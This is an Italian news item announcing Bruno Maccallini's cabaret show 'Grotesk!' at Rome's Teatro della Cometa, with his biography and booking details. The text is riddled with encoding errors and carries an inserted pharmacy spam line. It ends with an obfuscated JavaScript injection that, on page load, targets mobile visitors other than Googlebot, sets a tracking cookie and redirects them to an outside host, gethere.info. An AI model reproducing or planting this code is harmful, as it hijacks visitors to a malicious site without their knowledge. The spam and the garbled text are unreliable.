News

Grotesk con Bruno Maccalini al Teatro della Cometa dal 25 aprile

Bruno Maccallini, presenterA� in prima assoluta al Teatro della Cometa dal 25 Aprile al 6 Maggio 2018, il suo ultimo spettacolo GROTESK! Ridere rende liberi, ispirato ai protagonisti del cabaret berlinese tra le due guerre.

Grotesk, un mood, un timbro, un carattere e molte scene disseminate nella Berlino di Weimar; un confA�rencier irriverente e mordace, un provocatore irresistibile, una��eccellenza della risata, dello sberleffo, del ghigno satirico. Il suo personaggio dA� figura alla��humour agro che aveva contribuito a fare del Kabarett berlinese uno spazio di libertA� e di critica sociale; A? lui a incarnarne al meglio lo spirito. A? un artista, un poa�� mago, un poa�� prestigiatore, o forse, piA? che un personaggio, A? solo una parte in commedia; magari un imbroglione, un mestatore che dispensa storie scaturite dagli autori piA? graffianti della��epoca weimariana: aggredisce il pubblico con le contestazioni radicali di Walther Mehring, lo spiazza attraverso i paradossi del grande Tucholsky, lo blandisce al suono delle musiche di Kurt Weill e Friedrich HollA�nder. Maschera mobile che registra puntuale tutti gli umori, il Nostro vive gli anni ruggenti in cui la scena del Kabarett rivela sempre piA? il volto da��una Germania democratica, radicale e antimilitarista. E li vive tutti, dalla��inizio tempestoso al disastro finale, quando Berlino sprofonda dentro il nazismo; con lo stesso humour inossidabile si affaccia agli orli del baratro spalancato dal regime finchA� non ne A? a sua volta inghiottito. Indossando di volta in volta i panni del comico, del conferenziere, del mentalista, destreggiandosi fra musiche complici e testi esilaranti, non smette mai di aggredire il comune buonsenso, di denunciarne il vuoto che nasconde. Grotesk si fa modello ineguagliato di un A�campo di battaglia – come sognava HollA�nder – su cui con le sole armi pulite delle parole giuste e della musica si possono distruggere le armi da��acciaioA�.

Da sempre attratto dagli spettacoli di Kabarett nella Berlino degli anni 20-30 in tutti i suoi ambiti, dalla��intrattenimento alla satira socio-politica, Maccallini sarA� in scena con tre musicisti; firma anche il copione insieme ad Antonella Ottai (Dip. Storia della��Arte e dello Spettacolo della��UniversitA� a�?Sapienzaa�? di Roma ) e la regia. Lo spettacolo si avvale della preziosa collaborazione di Luca Ruzza per la��impianto scenico (docente di Scenografia virtuale alla a�?Sapienzaa�? e grande esperto di nuove tecnologie digitali), di Alexandra Stelzer per i costumi (mente creativa nonchA� fondatrice della casa di moda DeCall) e di Maurizio Montobbio per le luci (giA� lighting designer de la��OpA�ra National de Paris e del Crazy Horse).

BRUNO MACCALLINI
Attore, autore, regista, produttore

celebrex online, cheap clomid.

Nato ad Avezzano, diplomato alla��Accademia Nazionale da��Arte Drammatica a�?Silvio Da��Amicoa�?, giA� attore, autore, produttore e regista di teatro in Italia, A? protagonista di film di successo in Germania, dove gode di una vasta popolaritA� (A? uno dei volti italiani piA? amati nei paesi di lingua tedesca). Ha anche firmato e diretto numerosi documentari per la televisione italiana e tedesca con la sua SocietA� MAC PRODUZIONI Srl (oltre 60 ore per la Rai).

Negli ultimi anni per Ullstein Verlag ha pubblicato con la sua ex compagna, la��attrice Jutta Speidel, quattro libri di successo, balzando in poche settimane ai vertici delle classifiche dei tascabili piA? venduti in Germania con oltre 200.000 copie. Per Piper – Malik ha scritto un libro sulla provincia italiana e per Christian Verlag un fortunatissimo libro di ricette.

Nel 2014 A? stato insignito del Premio a�?Tourism Ambassadora�? dalle Associazioni Travel Industry Club e ITB di Berlino. Bruno Maccallini ha 58 anni, parla la��inglese e il tedesco. Vive tra Roma e Monaco di Baviera.

Teatro della Cometa A�- Via del Teatro Marcello, 4 a�� 00186
Orario prenotazioni e vendita biglietti: A�dal martedA� al sabato, ore 10:00 -19:00 (lunedA� riposto), domenica 14:30 a�� 17:00 – Telefono: 06.6784380

Orari spettacolo: dal martedA� al venerdA� ore 21.00. Sabato doppia replica ore 17,00 e ore 21,00. Domenica ore 17.00. Costo biglietti: platea 25 euro, prima galleria 20 euro, seconda galleria 18 euro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}